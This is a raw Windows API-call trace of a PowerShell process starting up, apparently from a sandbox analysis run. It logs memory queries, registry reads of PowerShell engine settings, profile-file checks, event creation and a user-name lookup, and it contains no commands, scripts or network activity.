[0081.980] VirtualQuery (in: lpAddress=0xc9f40, lpBuffer=0xcae00, dwLength=0x30 | out: lpBuffer=0xcae00*(BaseAddress=0xc9000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x7000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.129] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.129] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.129] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.129] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.129] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.129] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.129] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.130] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.131] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.131] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.131] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.131] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.131] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.131] VirtualQuery (in: lpAddress=0xcb4f0, lpBuffer=0xcc3b0, dwLength=0x30 | out: lpBuffer=0xcc3b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.131] CoTaskMemAlloc (cb=0x104) returned 0x1b835850
[0082.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b835850, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.131] CoTaskMemFree (pv=0x1b835850)
[0082.146] CoTaskMemAlloc (cb=0x104) returned 0x1b835850
[0082.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b835850, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.146] CoTaskMemFree (pv=0x1b835850)
[0082.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.175] VirtualQuery (in: lpAddress=0xcb7a0, lpBuffer=0xcc660, dwLength=0x30 | out: lpBuffer=0xcc660*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.178] VirtualQuery (in: lpAddress=0xcb7a0, lpBuffer=0xcc660, dwLength=0x30 | out: lpBuffer=0xcc660*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.178] VirtualQuery (in: lpAddress=0xcaff0, lpBuffer=0xcbeb0, dwLength=0x30 | out: lpBuffer=0xcbeb0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.178] VirtualQuery (in: lpAddress=0xcaff0, lpBuffer=0xcbeb0, dwLength=0x30 | out: lpBuffer=0xcbeb0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.179] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5f8 | out: phkResult=0xcd5f8*=0x3a0) returned 0x0
[0082.179] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd57c, lpData=0x0, lpcbData=0xcd578*=0x0 | out: lpType=0xcd57c*=0x1, lpData=0x0, lpcbData=0xcd578*=0x56) returned 0x0
[0082.179] CoTaskMemAlloc (cb=0x5a) returned 0x331540
[0082.179] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd54c, lpData=0x331540, lpcbData=0xcd548*=0x56 | out: lpType=0xcd54c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd548*=0x56) returned 0x0
[0082.179] CoTaskMemFree (pv=0x331540)
[0082.179] RegCloseKey (hKey=0x3a0) returned 0x0
[0082.179] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5f8 | out: phkResult=0xcd5f8*=0x3a0) returned 0x0
[0082.179] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd57c, lpData=0x0, lpcbData=0xcd578*=0x0 | out: lpType=0xcd57c*=0x1, lpData=0x0, lpcbData=0xcd578*=0x56) returned 0x0
[0082.179] CoTaskMemAlloc (cb=0x5a) returned 0x331540
[0082.179] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd54c, lpData=0x331540, lpcbData=0xcd548*=0x56 | out: lpType=0xcd54c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd548*=0x56) returned 0x0
[0082.179] CoTaskMemFree (pv=0x331540)
[0082.179] RegCloseKey (hKey=0x3a0) returned 0x0
[0082.180] CoTaskMemAlloc (cb=0x20c) returned 0x38a950
[0082.180] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x38a950 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
[0082.180] CoTaskMemFree (pv=0x38a950)
[0082.180] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xcd1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
[0082.180] CoTaskMemAlloc (cb=0x20c) returned 0x38a950
[0082.180] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x38a950 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
[0082.180] CoTaskMemFree (pv=0x38a950)
[0082.180] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xcd1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
[0082.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
[0082.180] SetErrorMode (uMode=0x1) returned 0x1
[0082.180] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd560 | out: lpFileInformation=0xcd560*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.180] SetErrorMode (uMode=0x1) returned 0x1
[0082.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
[0082.180] SetErrorMode (uMode=0x1) returned 0x1
[0082.181] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd560 | out: lpFileInformation=0xcd560*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.181] SetErrorMode (uMode=0x1) returned 0x1
[0082.181] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39
[0082.181] SetErrorMode (uMode=0x1) returned 0x1
[0082.181] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd560 | out: lpFileInformation=0xcd560*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.181] SetErrorMode (uMode=0x1) returned 0x1
[0082.181] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e
[0082.181] SetErrorMode (uMode=0x1) returned 0x1
[0082.181] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd560 | out: lpFileInformation=0xcd560*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.181] SetErrorMode (uMode=0x1) returned 0x1
[0082.181] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.181] CoTaskMemFree (pv=0x1b822f80)
[0082.182] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.182] CoTaskMemFree (pv=0x1b822f80)
[0082.182] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.182] CoTaskMemFree (pv=0x1b822f80)
[0082.182] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.182] CoTaskMemFree (pv=0x1b822f80)
[0082.194] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.194] CoTaskMemFree (pv=0x1b822f80)
[0082.194] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a0
[0082.194] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x350
[0082.194] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x374
[0082.195] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378
[0082.195] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c
[0082.195] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x380
[0082.195] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384
[0082.195] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
[0082.195] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a4
[0082.195] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x370
[0082.195] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390
[0082.195] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394
[0082.195] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.195] CoTaskMemFree (pv=0x1b822f80)
[0082.196] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0082.196] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcd740 | out: lpMode=0xcd740) returned 1
[0082.196] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.197] CoTaskMemFree (pv=0x1b822f80)
[0082.198] SetEvent (hEvent=0x378) returned 1
[0082.198] SetEvent (hEvent=0x3a0) returned 1
[0082.198] SetEvent (hEvent=0x350) returned 1
[0082.198] SetEvent (hEvent=0x374) returned 1
[0082.198] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
[0082.200] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0082.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.200] CoTaskMemFree (pv=0x1b822f80)
[0082.200] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd498 | out: phkResult=0xcd498*=0x308) returned 0x0
[0082.200] RegQueryValueExW (in: hKey=0x308, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcd41c, lpData=0x0, lpcbData=0xcd418*=0x0 | out: lpType=0xcd41c*=0x0, lpData=0x0, lpcbData=0xcd418*=0x0) returned 0x2
[0083.673] CoTaskMemAlloc (cb=0x104) returned 0x1b822f80
[0083.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b822f80, nSize=0x80 | out: lpBuffer="") returned 0x0
[0083.673] CoTaskMemFree (pv=0x1b822f80)
[0083.680] SetEvent (hEvent=0x318) returned 1
[0083.680] CoTaskMemAlloc (cb=0x804) returned 0x1b831600
[0083.680] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b831600, nSize=0xcd5c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd5c8) returned 0x1
[0083.681] CoTaskMemFree (pv=0x1b831600)
[0083.681] CoTaskMemAlloc (cb=0x204) returned 0x321ab0
